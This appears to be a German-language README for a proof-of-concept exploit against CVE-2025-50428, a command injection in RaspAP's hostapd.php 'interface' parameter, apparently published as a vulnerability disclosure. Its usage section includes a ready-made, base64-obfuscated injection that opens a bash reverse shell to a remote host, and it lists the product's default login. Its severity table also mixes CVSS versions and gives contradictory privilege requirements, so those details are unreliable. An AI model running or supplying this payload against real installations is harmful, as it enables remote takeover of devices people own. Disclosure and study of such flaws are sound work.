
Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP
Ein Proof-of-Concept-Exploit für CVE-2025-50428, eine Befehlseinschleusungsschwachstelle in RaspAP raspap-webgui 3.2.9 und früher.
| Schwachstellen-ID | CVE-2025-50428 |
|---|---|
| Schweregrad | Hoch (CVSS 3.1: 8.6) |
| CVSS-Vektor | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Schwachstellentyp | Code-Einschleusung |
| Angriffsvektor | Remote (Authentifiziert) |
| Erforderliche Berechtigungen | Niedrig |
| Auswirkung | Code-Ausführung, Privilegieneskalation |
| Betroffenes Produkt | raspap-webgui ≤ 3.2.9 |
| Entdeckt von | SmartTECS Cyber Security GmbH |
Dieser Exploit zielt auf eine Befehlseinschleusungsschwachstelle im hostapd.php-Skript von RaspAP ab. Die Schwachstelle besteht aufgrund unzureichender Bereinigung von Benutzereingaben, die über den Parameter interface übergeben werden. Ein authentifizierter Angreifer kann beliebige Betriebssystembefehle einschleusen, was zur Code-Ausführung mit den Berechtigungen des Benutzers www-data führt.
requests-Bibliothekpython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: Basis-URL der RaspAP-Installation (z.B. http://192.168.122.22)--interface: Wert für den Interface-Parameter, Einschleusungs-Payload erlaubt--username: RaspAP-Benutzername (Standard: admin)--password: RaspAP-Passwort (Standard: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH ist ein Cybersicherheitsunternehmen, das sich auf Penetrationstests, sichere Softwareentwicklung und Schwachstellenforschung spezialisiert hat. Das Unternehmen bietet maßgeschneiderte Sicherheitsbewertungen, Incident Response und strategische Beratungsdienste an, um Organisationen dabei zu helfen, kritische Systeme vor sich entwickelnden Cyberbedrohungen zu schützen.
Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis haben. Der Autor und die SmartTECS Cyber Security GmbH übernehmen keine Haftung für Missbrauch oder Schäden.